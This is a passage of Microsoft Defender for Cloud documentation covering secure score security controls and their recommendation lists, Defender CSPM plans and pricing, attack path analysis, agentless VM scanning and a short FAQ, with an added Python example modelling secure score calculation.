- Running container images should have vulnerability findings resolved 


Secure score: 4 

Security control and description: Remediate security configurations - Misconfigured IT 
assets have a higher risk of being attacked. Use these recommendations to harden the 
identified misconfigurations across your infrastructure. 

Recommendations: 

- Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed 
- Azure DevOps security posture findings should be resolved 
- Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed 
- Containers should only use allowed AppArmor profiles 
- Log Analytics agent should be installed on Linux-based Azure Arc-enabled machines 
- Log Analytics agent should be installed on virtual machine scale sets 
- Log Analytics agent should be installed on virtual machines 
- Log Analytics agent should be installed on Windows-based Azure Arc-enabled machines 
- Machines should be configured securely 
- SQL databases should have vulnerability findings resolved 
- SQL managed instances should have vulnerability assessment configured 
- SQL servers on machines should have vulnerability findings resolved 
- SQL servers should have vulnerability assessment configured 
- Virtual machine scale sets should be configured securely 
- Vulnerabilities in security configuration on your Linux machines should be remediated (powered by Guest Configuration) 
- Vulnerabilities in security configuration on your Windows machines should be remediated (powered by Guest Configuration) 


Secure score: 4 

Security control and description: Manage access and permissions - A core part of a 
security program is ensuring your users have the necessary access to do their jobs but 
no more than that: the least privilege access model. Use these recommendations to 
manage your identity and access requirements. 

Recommendations: 

- Authentication to Linux machines should require SSH keys 
- Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed 
- Azure Cosmos DB accounts should use Azure Active Directory as the only authentication method 
- Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed 
- Blocked accounts with owner permissions on Azure resources should be removed 
- Blocked accounts with read and write permissions on Azure resources should be removed 
- Container with privilege escalation should be avoided 
- Containers sharing sensitive host namespaces should be avoided 
- Deprecated accounts should be removed from subscriptions 
- Deprecated accounts with owner permissions should be removed from subscriptions 
- External accounts with owner permissions should be removed from subscriptions 
- External accounts with write permissions should be removed from subscriptions 
- Function apps should have Client Certificates (Incoming client certificates) enabled 
- Guest accounts with owner permissions on Azure resources should be removed 
- Guest accounts with write permissions on Azure resources should be removed 
- Guest Configuration extension should be installed on machines 
- Immutable (read-only) root filesystem should be enforced for containers 
- Least privileged Linux capabilities should be enforced for containers 
- Managed identity should be used in API apps 
- Managed identity should be used in function apps 
- Managed identity should be used in web apps 
- Privileged containers should be avoided 
- Role-Based Access Control should be used on Kubernetes Services 
- Running containers as root user should be avoided 
- Service Fabric clusters should only use Azure Active Directory for client authentication 
- Storage account public access should be disallowed 
- Usage of pod HostPath volume mounts should be restricted to a known list to restrict node access from compromised containers 
- Virtual machines' Guest Configuration extension should be deployed with system-assigned managed identity 


Secure score: 4 

Security control and description: Enable encryption at rest - Use these 
recommendations to ensure you mitigate misconfigurations around the protection of 
your stored data. 

Recommendations: 

- Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign 
- Transparent Data Encryption on SQL databases should be enabled 
- Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources 


Secure score: 4 

Security control and description: Encrypt data in transit - Use these recommendations 
to secure data that's moving between components, locations, or programs. Such data is 
susceptible to man-in-the-middle attacks, eavesdropping, and session hijacking. 

Recommendations: 

- API App should only be accessible over HTTPS 
- Enforce SSL connection should be enabled for MySQL database servers 
- Enforce SSL connection should be enabled for PostgreSQL database servers 
- FTPS should be required in API apps 
- FTPS should be required in function apps 
- FTPS should be required in web apps 
- Function App should only be accessible over HTTPS 
- Redis Cache should allow access only via SSL 
- Secure transfer to storage accounts should be enabled 
- TLS should be updated to the latest version for API apps 
- TLS should be updated to the latest version for function apps 
- TLS should be updated to the latest version for web apps 
- Web Application should only be accessible over HTTPS 


Secure score: 4 

Security control and description: Restrict unauthorized network access - Azure offers a 
suite of tools designed to ensure accesses across your network meet the highest 
security standards. Use these recommendations to manage Defender for Cloud's 
adaptive network hardening settings, ensure you've configured Azure Private Link for all 
relevant PaaS services, enable Azure Firewall on your virtual networks, and more. 

Recommendations: 

- Adaptive network hardening recommendations should be applied on internet facing virtual machines 
- All network ports should be restricted on network security groups associated to your virtual machine 
- App Configuration should use private link 
- Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed 
- Azure Cache for Redis should reside within a virtual network 
- Azure Event Grid domains should use private link 
- Azure Event Grid topics should use private link 
- Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed 
- Azure Machine Learning workspaces should use private link 
- Azure SignalR Service should use private link 
- Azure Spring Cloud should use network injection 
- Container registries should not allow unrestricted network access 
- Container registries should use private link 
- CORS should not allow every resource to access API Apps 
- CORS should not allow every resource to access Function Apps 
- CORS should not allow every resource to access Web Applications 
- Firewall should be enabled on Key Vault 
- Internet-facing virtual machines should be protected with network security groups 
- IP forwarding on your virtual machine should be disabled 
- Kubernetes API server should be configured with restricted access 
- Private endpoint should be configured for Key Vault 
- Private endpoint should be enabled for MariaDB servers 
- Private endpoint should be enabled for MySQL servers 
- Private endpoint should be enabled for PostgreSQL servers 
- Public network access should be disabled for MariaDB servers 
- Public network access should be disabled for MySQL servers 
- Public network access should be disabled for PostgreSQL servers 
- Services should listen on allowed ports only 
- Storage account should use a private link connection 
- Storage accounts should restrict network access using virtual network rules 
- Usage of host networking and ports should be restricted 
- Virtual networks should be protected by Azure Firewall 
- VM Image Builder templates should use private link 
Secure score: 3 

Security control and description: Apply adaptive application control - Adaptive 
application control is an intelligent, automated, end-to-end solution to control which 
applications can run on your machines. It also helps to harden your machines against 
malware. 

Recommendations: 

- Adaptive application controls for defining safe applications should be enabled on your machines 
- Allowlist rules in your adaptive application control policy should be updated 
- Log Analytics agent should be installed on Linux-based Azure Arc-enabled machines 
- Log Analytics agent should be installed on virtual machines 
- Log Analytics agent should be installed on Windows-based Azure Arc-enabled machines 


Secure score: 2 

Security control and description: Protect applications against DDoS attacks - Azure's 
advanced networking security solutions include Azure DDoS Protection, Azure Web 
Application Firewall, and the Azure Policy Add-on for Kubernetes. Use these 
recommendations to ensure your applications are protected with these tools and others. 

Recommendations: 

- Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed 
- Azure DDoS Protection Standard should be enabled 
- Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed 
- Container CPU and memory limits should be enforced 
- Web Application Firewall (WAF) should be enabled for Application Gateway 
- Web Application Firewall (WAF) should be enabled for Azure Front Door Service service 


Secure score: 2 

Security control and description: Enable endpoint protection - Defender for Cloud 
checks your organization's endpoints for active threat detection and response solutions 
such as Microsoft Defender for Endpoint or any of the major solutions shown in this list. 
When an Endpoint Detection and Response (EDR) solution isn't found, you can use these 
recommendations to deploy Microsoft Defender for Endpoint (included as part of 
Microsoft Defender for servers). Other recommendations in this control help you deploy 
the Log Analytics agent and configure file integrity monitoring. 

Recommendations: 

- Endpoint protection health issues on machines should be resolved 
- Endpoint protection health issues on machines should be resolved 
- Endpoint protection health issues on virtual machine scale sets should be resolved 
- Endpoint protection should be installed on machines 
- Endpoint protection should be installed on machines 
- Endpoint protection should be installed on virtual machine scale sets 
- Install endpoint protection solution on virtual machines 
- Log Analytics agent should be installed on Linux-based Azure Arc-enabled machines 
- Log Analytics agent should be installed on virtual machine scale sets 
- Log Analytics agent should be installed on virtual machines 
- Log Analytics agent should be installed on Windows-based Azure Arc-enabled machines 
Secure score: 1 

Security control and description: Enable auditing and logging - Detailed logs are a 
crucial part of incident investigations and many other troubleshooting operations. The 
recommendations in this control focus on ensuring you've enabled diagnostic logs 
wherever relevant. 

Recommendations: 

- Auditing on SQL server should be enabled 
- Diagnostic logs in App Service should be enabled 
- Diagnostic logs in Azure Data Lake Store should be enabled 
- Diagnostic logs in Azure Stream Analytics should be enabled 
- Diagnostic logs in Batch accounts should be enabled 
- Diagnostic logs in Data Lake Analytics should be enabled 
- Diagnostic logs in Event Hub should be enabled 
- Diagnostic logs in Key Vault should be enabled 
- Diagnostic logs in Kubernetes services should be enabled 
- Diagnostic logs in Logic Apps should be enabled 
- Diagnostic logs in Search services should be enabled 
- Diagnostic logs in Service Bus should be enabled 
- Diagnostic logs in Virtual Machine Scale Sets should be enabled 


Secure score: 0 

Security control and description: Enable enhanced security features - Use these 
recommendations to enable any of the enhanced security features plans. 

Recommendations: 

- Azure Arc-enabled Kubernetes clusters should have the Defender extension installed 
- Azure Kubernetes Service clusters should have Defender profile enabled 
- File integrity monitoring should be enabled on machines 
- GitHub repositories should have Code scanning enabled 
- GitHub repositories should have Dependabot scanning enabled 
- GitHub repositories should have Secret scanning enabled 
- Microsoft Defender for App Service should be enabled 
- Microsoft Defender for Azure SQL Database servers should be enabled 
- Microsoft Defender for Containers should be enabled 
- Microsoft Defender for DNS should be enabled 
- Microsoft Defender for Key Vault should be enabled 
- Microsoft Defender for open-source relational databases should be enabled 
- Microsoft Defender for Resource Manager should be enabled 
- Microsoft Defender for servers should be enabled 
- Microsoft Defender for servers should be enabled on workspaces 
- Microsoft Defender for SQL on machines should be enabled on workspaces 
- Microsoft Defender for SQL servers on machines should be enabled 
- Microsoft Defender for Storage should be enabled 


Secure score: 0 

Security control and description: Implement security best practices - This control has 
no impact on your secure score. For that reason, it's a collection of recommendations 
which are important to fulfil for the sake of your organization's security, but which we 
feel shouldn't be a part of how you assess your overall score. 

Recommendations: 

- [Enable if required] Azure Cosmos DB accounts should use customer-managed keys to encrypt data at rest 
- [Enable if required] Azure Machine Learning workspaces should be encrypted with a customer-managed key (CMK) 
- [Enable if required] Cognitive Services accounts should enable data encryption with a customer-managed key (CMK) 
- [Enable if required] Container registries should be encrypted with a customer-managed key (CMK) 
- [Enable if required] MySQL servers should use customer-managed keys to encrypt data at rest 
- [Enable if required] PostgreSQL servers should use customer-managed keys to encrypt data at rest 
- [Enable if required] SQL managed instances should use customer-managed keys to encrypt data at rest 
- [Enable if required] SQL servers should use customer-managed keys to encrypt data at rest 
- [Enable if required] Storage accounts should use customer-managed key (CMK) for encryption 
- A maximum of 3 owners should be designated for subscriptions 
- Access to storage accounts with firewall and virtual network configurations should be restricted 
- Accounts with read permissions on Azure resources should be MFA enabled 
- All advanced threat protection types should be enabled in SQL managed instance advanced data security settings 
- All advanced threat protection types should be enabled in SQL server advanced data security settings 
- API Management services should use a virtual network 
- Audit retention for SQL servers should be set to at least 90 days 
- Auto provisioning of the Log Analytics agent should be enabled on subscriptions 
- Automation account variables should be encrypted 
- Azure Backup should be enabled for virtual machines 
- Azure Cosmos DB accounts should have firewall rules 
- Cognitive Services accounts should enable data encryption 
- Cognitive Services accounts should restrict network access 
- Cognitive Services accounts should use customer owned storage or enable data encryption 
- Container hosts should be configured securely 
- Default IP Filter Policy should be Deny 
- Diagnostic logs in IoT Hub should be enabled 
- Email notification for high severity alerts should be enabled 
- Email notification to subscription owner for high severity alerts should be enabled 
- Ensure API app has Client Certificates Incoming client certificates set to On 
- External accounts with read permissions should be removed from subscriptions 
- Geo-redundant backup should be enabled for Azure Database for MariaDB 
- Geo-redundant backup should be enabled for Azure Database for MySQL 
- Geo-redundant backup should be enabled for Azure Database for PostgreSQL 
- Guest accounts with read permissions on Azure resources should be removed 
- Guest Attestation extension should be installed on supported Linux virtual machine scale sets 
- Guest Attestation extension should be installed on supported Linux virtual machines 
- Guest Attestation extension should be installed on supported Windows virtual machine scale sets 
- Guest Attestation extension should be installed on supported Windows virtual machines 
- Guest Configuration extension should be installed on machines 
- Identical Authentication Credentials 
- IP Filter rule large IP range 
- Java should be updated to the latest version for API apps 
- Java should be updated to the latest version for function apps 
- Java should be updated to the latest version for web apps 
- Key Vault keys should have an expiration date 
- Key Vault secrets should have an expiration date 
- Key vaults should have purge protection enabled 
- Key vaults should have soft delete enabled 
- Kubernetes clusters should be accessible only over HTTPS 
- Kubernetes clusters should disable automounting API credentials 
- Kubernetes clusters should not grant CAPSYSADMIN security capabilities 
- Kubernetes clusters should not use the default namespace 
- Linux virtual machines should enforce kernel module signature validation 
- Linux virtual machines should use only signed and trusted boot components 
- Linux virtual machines should use Secure Boot 
- Machines should be restarted to apply security configuration updates 
- Machines should have ports closed that might expose attack vectors 
- MFA should be enabled on accounts with read permissions on subscriptions 
- Microsoft Defender for SQL should be enabled for unprotected Azure SQL servers 
- Microsoft Defender for SQL should be enabled for unprotected SQL Managed Instances 
- Network Watcher should be enabled 
- Non-internet-facing virtual machines should be protected with network security groups 
- Over-provisioned identities in subscriptions should be investigated to reduce the Permission Creep Index (PCI) 
- PHP should be updated to the latest version for API apps 
- PHP should be updated to the latest version for web apps 
- Private endpoint connections on Azure SQL Database should be enabled 
- Public network access on Azure SQL Database should be disabled 
- Public network access should be disabled for Cognitive Services accounts 
- Python should be updated to the latest version for API apps 
- Python should be updated to the latest version for function apps 
- Python should be updated to the latest version for web apps 
- Remote debugging should be turned off for API App 
- Remote debugging should be turned off for Function App 
- Remote debugging should be turned off for Web Applications 
- Secure Boot should be enabled on supported Windows virtual machines 
- SQL servers should have an Azure Active Directory administrator provisioned 
- Storage accounts should be migrated to new Azure Resource Manager resources 
- Subnets should be associated with a network security group 
- Subscriptions should have a contact email address for security issues 
- There should be more than one owner assigned to subscriptions 
- Validity period of certificates stored in Azure Key Vault should not exceed 12 months 
- Virtual machines guest attestation status should be healthy 
- Virtual machines' Guest Configuration extension should be deployed with system-assigned managed identity 
- Virtual machines should be migrated to new Azure Resource Manager resources 
- vTPM should be enabled on supported virtual machines 
- Web apps should request an SSL certificate for all incoming requests 
- Windows Defender Exploit Guard should be enabled on machines 
- Windows web servers should be configured to use secure communication protocols 


Next steps 

This article described the secure score and the included security controls. 


Access and track your secure score 


For related material, see the following articles: 

- Learn about the different elements of a recommendation 
- Learn how to remediate recommendations 
- View the GitHub-based tools for working programmatically with secure score 
- Check out common questions about secure score 


Cloud Security Posture Management 
(CSPM) 


Article • 08/15/2023 


One of Microsoft Defender for Cloud's main pillars for cloud security is Cloud Security 
Posture Management (CSPM). CSPM provides you with hardening guidance that helps 
you efficiently and effectively improve your security. CSPM also gives you visibility into 
your current security situation. 


Defender for Cloud continually assesses your resources, subscriptions and organization 
for security issues. Defender for Cloud shows your security posture in secure score. The 
secure score is an aggregated score of the security findings that tells you your current 
security situation. The higher the score, the lower the identified risk level. 


Prerequisites 


- Foundational CSPM - None 

- Defender Cloud Security Posture Management (CSPM) - Agentless scanning 
requires the Subscription Owner to enable the plan. Anyone with a lower level of 
authorization can enable the Defender CSPM plan, but the agentless scanner won't 
be enabled by default due to lack of permissions. Attack path analysis and security 
explorer won't be populated with vulnerabilities because the agentless scanner is 
disabled. 


For commercial and national cloud coverage, review features supported in different 
Azure cloud environments. 


Defender CSPM plan options 


Defender for Cloud offers foundational multicloud CSPM capabilities for free. These 
capabilities are automatically enabled by default on any subscription or account that has 
onboarded to Defender for Cloud. The foundational CSPM includes asset discovery, 
continuous assessment and security recommendations for posture hardening, 
compliance with Microsoft Cloud Security Benchmark (MCSB), and a secure score that 
measures the current status of your organization's posture. 


The optional Defender CSPM plan provides advanced posture management capabilities 
such as attack path analysis, cloud security explorer, advanced threat hunting, security 
governance capabilities, and also tools to assess your security compliance with a wide 
range of benchmarks, regulatory standards, and any custom security policies required in 
your organization, industry, or region. 


Plan pricing 


Microsoft Defender CSPM protects across all your multicloud workloads, but billing only 
applies for Servers, Database, and Storage accounts at $5/billable resource/month. The 
underlying compute services for AKS are regarded as servers for billing purposes. 


Note 

- The Microsoft Defender CSPM plan protects across multicloud workloads. 
With Defender CSPM generally available (GA), the plan will remain free until 
billing starts on August 1, 2023. Billing will apply for Servers, Database, and 
Storage resources. Billable workloads will be VMs, Storage accounts, OSS DBs, 
SQL PaaS, & SQL servers on machines. 

- This price includes free vulnerability assessments for 20 unique images per 
charged resource, whereby the count will be based on the previous month's 
consumption. Every subsequent scan will be charged at $0.29 per image 
digest. The majority of customers are not expected to incur any additional 
image scan charges. For subscriptions that are both under the Defender CSPM 
and Defender for Containers plans, free vulnerability assessment will be 
calculated based on free image scans provided via the Defender for 
Containers plan, as specified in the Microsoft Defender for Cloud pricing 
page. 


Learn more about Defender CSPM pricing. 


Plan availability 


The following table summarizes each plan and their cloud availability. 


Feature | Foundational CSPM | Defender CSPM | Cloud availability 
Security recommendations to fix misconfigurations and weaknesses | Yes | Yes | Azure, AWS, GCP, on-premises 
Asset inventory | Yes | Yes | Azure, AWS, GCP, on-premises 
Secure score | Yes | Yes | Azure, AWS, GCP, on-premises 
Data visualization and reporting with Azure Workbooks | Yes | Yes | Azure, AWS, GCP, on-premises 
Data exporting | Yes | Yes | Azure, AWS, GCP, on-premises 
Workflow automation | Yes | Yes | Azure, AWS, GCP, on-premises 
Tools for remediation | Yes | Yes | Azure, AWS, GCP, on-premises 
Microsoft Cloud Security Benchmark | Yes | Yes | Azure, AWS, GCP 
Governance | - | Yes | Azure, AWS, GCP, on-premises 
Regulatory compliance | - | Yes | Azure, AWS, GCP, on-premises 
Cloud security explorer | - | Yes | Azure, AWS, GCP 
Attack path analysis | - | Yes | Azure, AWS, GCP 
Agentless scanning for machines | - | Yes | Azure, AWS, GCP 
Agentless discovery for Kubernetes | - | Yes | Azure 
Container registries vulnerability assessment, including registry scanning | - | Yes | Azure 
Data aware security posture | - | Yes | Azure, AWS, GCP 
EASM insights in network exposure | - | Yes | Azure, AWS, GCP 


Note 


If you have enabled Defender for DevOps, you will only gain cloud security graph 


and attack path analysis to the artifacts that arrive through those connectors. 


To enable Governance for DevOps related recommendations, the Defender CSPM 
plan needs to be enabled on the Azure subscription that hosts the DevOps 
connector. 


Next steps 


Learn about Defender for Cloud's Defender plans. 


Microsoft cloud security benchmark in Defender for Cloud

Microsoft Defender for Cloud streamlines the process for meeting regulatory compliance requirements, using the regulatory compliance dashboard. Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the standards that you've applied to your subscriptions. The dashboard reflects the status of your compliance with these standards.


The Microsoft cloud security benchmark (MCSB) is automatically assigned to your 
subscriptions and accounts when you onboard Defender for Cloud. This benchmark 
builds on the cloud security principles defined by the Azure Security Benchmark and 
applies these principles with detailed technical implementation guidance for Azure, for 
other cloud providers (such as AWS and GCP), and for other Microsoft clouds. 


[Diagram: the Azure Security Benchmark, a security benchmark for other cloud providers, and a security benchmark for other Microsoft clouds combine into the Microsoft Cloud Security Benchmark]


The compliance dashboard gives you a view of your overall compliance standing. 
Security for non-Azure platforms follows the same cloud-neutral security principles as 
Azure. Each control within the benchmark provides the same granularity and scope of 
technical guidance across Azure and other cloud resources. 


[Screenshot: the Regulatory compliance dashboard in the Azure portal. It lists the assigned standards (Azure Security Benchmark, NIST SP 800-53 R5, UK OFFICIAL and UK NHS, PCI DSS 3.2.1, SOC TSP, HIPAA HITRUST, Canada Federal PBMM) with their passed-controls counts, an Environments filter for Azure and AWS, and the expanded benchmark controls, for example DP-4 "Enable data at rest encryption by default" with its automated assessments for Azure (such as "Transparent Data Encryption on SQL databases should be enabled") and for AWS (such as "EBS default encryption should be enabled"), alongside the resource type and the resource compliance status. The dashboard note reads: "Under each applicable compliance control is the set of assessments run by Defender for Cloud that are associated with that control. If they are all green, it means those assessments are currently passing; this does not ensure you are fully compliant with that control. Furthermore, not all controls for any particular regulation are covered by Defender for Cloud assessments, and therefore this report is only a partial view of your overall compliance status."]


From the compliance dashboard, you're able to manage all of your compliance requirements for your cloud deployments, including automatic, manual, and shared responsibilities.


Note

Shared responsibilities are only compatible with Azure.


Next steps


- Improve your regulatory compliance
- Customize the set of standards in your regulatory compliance dashboard


Identify and analyze risks across your environment

One of the biggest challenges that security teams face today is the number of security issues they face on a daily basis. There are numerous security issues that need to be resolved and never enough resources to address them all.


Defender for Cloud's contextual security capabilities help security teams assess the risk behind each security issue and identify the highest-risk issues that need to be resolved soonest. Defender for Cloud helps security teams reduce the risk of an impactful breach to their environment in the most effective way.


All of these capabilities are available as part of the Defender Cloud Security Posture 
Management plan and require you to enable either agentless scanning for VMs or the 
vulnerability assessment capability on the Defender for Servers plan. 


What is cloud security graph? 


The cloud security graph is a graph-based context engine that exists within Defender for Cloud. It collects data from your multicloud environment and other data sources: for example, the cloud asset inventory, connections and lateral movement possibilities between resources, internet exposure, permissions, network connections, vulnerabilities, and more. The collected data is then used to build a graph representing your multicloud environment.


Defender for Cloud then uses the generated graph to perform an attack path analysis 
and find the issues with the highest risk that exist within your environment. You can also 
query the graph using the cloud security explorer. 
What is attack path analysis?


Attack path analysis is a graph-based algorithm that scans the cloud security graph. The 
scans expose exploitable paths that attackers may use to breach your environment to 
reach your high-impact assets. Attack path analysis exposes attack paths and suggests 
recommendations as to how best remediate issues that will break the attack path and 
prevent successful breach. 


When you take your environment's contextual information into account, for example its internet exposure, permissions, lateral movement possibilities, and more, attack path analysis identifies issues that may lead to a breach of your environment and helps you remediate the highest-risk ones first.


[Diagram: an attack path from Attacker → Vulnerability (CVE-5436-4223) → Sensitive data]


Learn how to use attack path analysis. 


What is cloud security explorer? 


By running graph-based queries on the cloud security graph with the cloud security 
explorer, you can proactively identify security risks in your multicloud environments. 
Your security team can use the query builder to search for and locate risks, while taking 
your organization's specific contextual and conventional information into account. 


Cloud security explorer lets you proactively explore your environment. You can search for security risks within your organization by running graph-based path-finding queries on top of the contextual security data that Defender for Cloud already provides, such as cloud misconfigurations, vulnerabilities, resource context, lateral movement possibilities between resources, and more.


Learn how to use the cloud security explorer, or check out the cloud security graph 
components list. 


Next steps 


- Identify and remediate attack paths
- Enabling agentless scanning for machines
- Build a query with the cloud security explorer


What is an external attack surface?

An external attack surface is the entire area of an organization or system that is susceptible to an attack from an external source. An organization's attack surface is made up of all the points of access that an unauthorized person could use to enter its system. The larger your attack surface is, the harder it is to protect.


You can use Defender for Cloud's new integration with Microsoft Defender External 
Attack Surface Management (Defender EASM), to improve your organization's security 
posture and reduce the potential risk of being attacked. Defender EASM continuously 
discovers and maps your digital attack surface to provide an external view of your online 
infrastructure. This visibility enables security and IT teams to identify unknowns, 
prioritize risk, eliminate threats, and extend vulnerability and exposure control beyond 
the firewall. 


Defender EASM applies Microsoft's crawling technology to discover assets that are 
related to your known online infrastructure, and actively scans these assets to discover 
new connections over time. Attack Surface Insights are generated by applying 
vulnerability and infrastructure data to showcase the key areas of concern for your 
organization, such as: 


- Discover digital assets, always-on inventory
- Analyze and prioritize risks and threats
- Pinpoint attacker-exposed weaknesses, anywhere and on-demand
- Gain visibility into third-party attack surfaces


EASM collects data for publicly exposed assets (“outside-in”). That data can be used by 
Defender for Cloud CSPM (“inside-out”) to assist with internet-exposure validation and 
discovery capabilities to provide better visibility to customers. 


Learn more 


You can learn more about Defender EASM, and learn about the pricing options available.


You can also learn how to deploy Defender for EASM to your Azure resource. 


Next step 


What are the cloud security graph, attack path analysis, and the cloud security explorer? 


Learn about agentless scanning

Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends beyond the reach of agent-based assessments. With agentless scanning for VMs, you can get frictionless, wide, and instant visibility on actionable posture issues without installed agents, network connectivity requirements, or machine performance impact.


Agentless scanning for VMs provides vulnerability assessment and software inventory, 
both powered by Microsoft Defender Vulnerability Management, in Azure and Amazon 
AWS environments. Agentless scanning is available in both Defender Cloud Security 
Posture Management (CSPM) and Defender for Servers P2. 


Availability 


(✔ supported, ✖ not supported)

Aspect: Release state
Details: GA

Aspect: Pricing
Details: Requires either Defender Cloud Security Posture Management (CSPM) or Microsoft Defender for Servers Plan 2

Aspect: Supported use cases
Details:
  ✔ Vulnerability assessment (powered by Defender Vulnerability Management)
  ✔ Software inventory (powered by Defender Vulnerability Management)
  ✔ Secret scanning (Preview)

Aspect: Clouds
Details:
  ✔ Azure Commercial clouds
  ✖ Azure Government
  ✖ Microsoft Azure operated by 21Vianet
  ✔ Connected AWS accounts
  ✔ Connected GCP projects

Aspect: Operating systems
Details:
  ✔ Windows
  ✔ Linux

Aspect: Instance and disk types
Details:
  Azure
  ✔ Standard VMs
  ✖ Unmanaged disks
  ✔ Virtual machine scale set - Flex
  ✖ Virtual machine scale set - Uniform
  AWS
  ✔ EC2
  ✔ Auto Scale instances
  ✖ Instances with a ProductCode (Paid AMIs)
  GCP
  ✔ Compute instances
  ✔ Instance groups (managed and unmanaged)

Aspect: Encryption
Details:
  Azure
  ✔ Unencrypted
  ✔ Encrypted - managed disks using Azure Storage encryption with platform-managed keys (PMK)
  ✖ Encrypted - other scenarios using platform-managed keys (PMK)
  ✖ Encrypted - customer-managed keys (CMK)
  AWS
  ✔ Unencrypted
  ✔ Encrypted - PMK
  ✔ Encrypted - CMK
  GCP
  ✔ Google-managed encryption key
  ✔ Customer-managed encryption key (CMEK)
  ✖ Customer-supplied encryption key (CSEK)


How agentless scanning for VMs works 


While agent-based methods use OS APIs in runtime to continuously collect security 
related data, agentless scanning for VMs uses cloud APIs to collect data. Defender for 
Cloud takes snapshots of VM disks and does an out-of-band, deep analysis of the OS 
configuration and file system stored in the snapshot. The copied snapshot doesn't leave 
the original compute region of the VM, and the VM is never impacted by the scan. 


After the necessary metadata is acquired from the disk, Defender for Cloud immediately 
deletes the copied snapshot of the disk and sends the metadata to Microsoft engines to 
analyze configuration gaps and potential threats. For example, in vulnerability 
assessment, the analysis is done by Defender Vulnerability Management. The results are 
displayed in Defender for Cloud, seamlessly consolidating agent-based and agentless 
results. 


The scanning environment where disks are analyzed is regional, volatile, isolated, and 
highly secure. Disk snapshots and data unrelated to the scan aren't stored longer than is 
necessary to collect the metadata, typically a few minutes. 


[Diagram: the customer account holds the virtual machine and its disk snapshot; the snapshot is analyzed by the scanning platform and vulnerability assessment inside an isolated, regional scanning environment; results are shown in the Defender for Cloud portal]


Next steps 


This article explains how agentless scanning works and how it helps you collect data 
from your machines. 


- Learn more about how to enable agentless scanning for VMs.

- Check out common questions about agentless scanning and how it affects the subscription/account, agentless data collection, and permissions used by agentless scanning.


Common questions about cloud security posture management

FAQ

One of Microsoft Defender for Cloud's main pillars for cloud security is Cloud Security Posture Management (CSPM). CSPM provides you with hardening guidance that helps you efficiently and effectively improve your security. CSPM also gives you visibility into your current security situation.


If I address only three out of four recommendations in a security control, will my secure score change?


No. It won't change until you remediate all of the recommendations for a single resource. To get the maximum score for a control, you must remediate all recommendations for all resources.


If a security control offers me zero points towards my secure score, should I ignore it?


In some cases, you'll see a control max score greater than zero, but the impact is zero. 
When the incremental score for fixing resources is negligible, it's rounded to zero. Don't 
ignore these recommendations because they still bring security improvements. The only 
exception is the "Additional Best Practice" control. Remediating these recommendations 
won't increase your score, but it will enhance your overall security. 
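To make the two answers above concrete, here is an added example that is not part of the Microsoft documentation. It models one security control with the scoring rule the secure score documentation gives, current score = max score × healthy resources / total resources, where a resource counts as healthy only once every recommendation in the control is fixed on it. The control, resource and recommendation names are constructed, and rounding the per-resource impact to whole points is an assumption made for the illustration.

```python
from __future__ import annotations

from dataclasses import dataclass, field, replace

# Constructed model of one secure score security control. Scoring rule (from the
# secure score documentation):
#   current score = max score * (healthy resources / total resources)
# A resource is healthy only when every recommendation in the control is
# remediated for it, which is why fixing 3 of 4 recommendations on a resource
# leaves the score unchanged. Names and numbers below are made up.


@dataclass(frozen=True)
class Control:
    name: str
    max_score: float
    recommendations: frozenset[str]
    resources: frozenset[str]
    # resource -> recommendations still unhealthy on that resource
    unhealthy: dict[str, frozenset[str]] = field(default_factory=dict)

    def healthy_resources(self) -> frozenset[str]:
        return frozenset(r for r in self.resources if not self.unhealthy.get(r))

    def current_score(self) -> float:
        if not self.resources:
            return 0.0
        return self.max_score * len(self.healthy_resources()) / len(self.resources)

    def potential_increase_per_resource(self) -> int:
        """Whole points gained by making one more resource healthy.

        Rounding to whole points is an assumption for this illustration; it shows
        how a control can have max_score > 0 yet a displayed impact of 0.
        """
        if not self.resources:
            return 0
        return round(self.max_score / len(self.resources))


def remediate(control: Control, resource: str, recommendation: str) -> Control:
    """Return a copy of the control with one recommendation fixed on one resource."""
    remaining = control.unhealthy.get(resource, frozenset()) - {recommendation}
    return replace(control, unhealthy={**control.unhealthy, resource: remaining})


def build_example() -> Control:
    recs = frozenset({"rec-1", "rec-2", "rec-3", "rec-4"})
    return Control(
        name="Example control",
        max_score=10,
        recommendations=recs,
        resources=frozenset({"vm-a", "vm-b"}),
        unhealthy={"vm-a": recs},  # vm-b already passes everything
    )


def walkthrough() -> list[float]:
    """Score after each of the four fixes on vm-a: unchanged until the last one."""
    control = build_example()
    scores = []
    for rec in sorted(control.recommendations):
        control = remediate(control, "vm-a", rec)
        scores.append(control.current_score())
    return scores


def negligible_impact_example() -> tuple[float, int]:
    """Max score 2 spread over 1000 resources: the per-resource impact rounds to 0."""
    resources = frozenset(f"res-{i}" for i in range(1000))
    control = Control("Wide control", 2, frozenset({"rec"}), resources,
                      {r: frozenset({"rec"}) for r in resources})
    return control.max_score, control.potential_increase_per_resource()


if __name__ == "__main__":
    print(walkthrough())                # [5.0, 5.0, 5.0, 10.0]
    print(negligible_impact_example())  # (2, 0)
```

The second function is the case from the second question: the control still has a non-zero maximum, so its recommendations are worth fixing even though the portal shows an impact of zero.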


How does scanning affect the instances? 


Since the scanning process is an out-of-band analysis of snapshots, it doesn't impact the 
actual workloads and isn't visible by the guest operating system. 


How does scanning affect the 
account/subscription? 


The scanning process has minimal footprint on your accounts and subscriptions. 


Cloud provider: Azure
Changes:
  - Adds a "VM Scanner Operator" role assignment
  - Adds a "vmScanners" resource with the relevant configurations used to manage the scanning process

Cloud provider: AWS
Changes:
  - Adds role assignment
  - Adds authorized audience to OpenID Connect provider
  - Snapshots are created next to the scanned volumes, in the same account, during the scan (typically for a few minutes)

Cloud provider: GCP
Changes:
  - Adds a role assignment


What is the Virtual Machine (VM) scan 
freshness? 


Each VM is scanned every 24 hours. 


Can I calculate the secure score at the resource group level?


Secure score is calculated per Azure subscription, AWS account or GCP project. You can 
also view the secure score within the management scope such as Azure management 
group, AWS management account or GCP organization. There's no secure score per 
resource group. 


Next steps 


Learn about Defender CSPM 


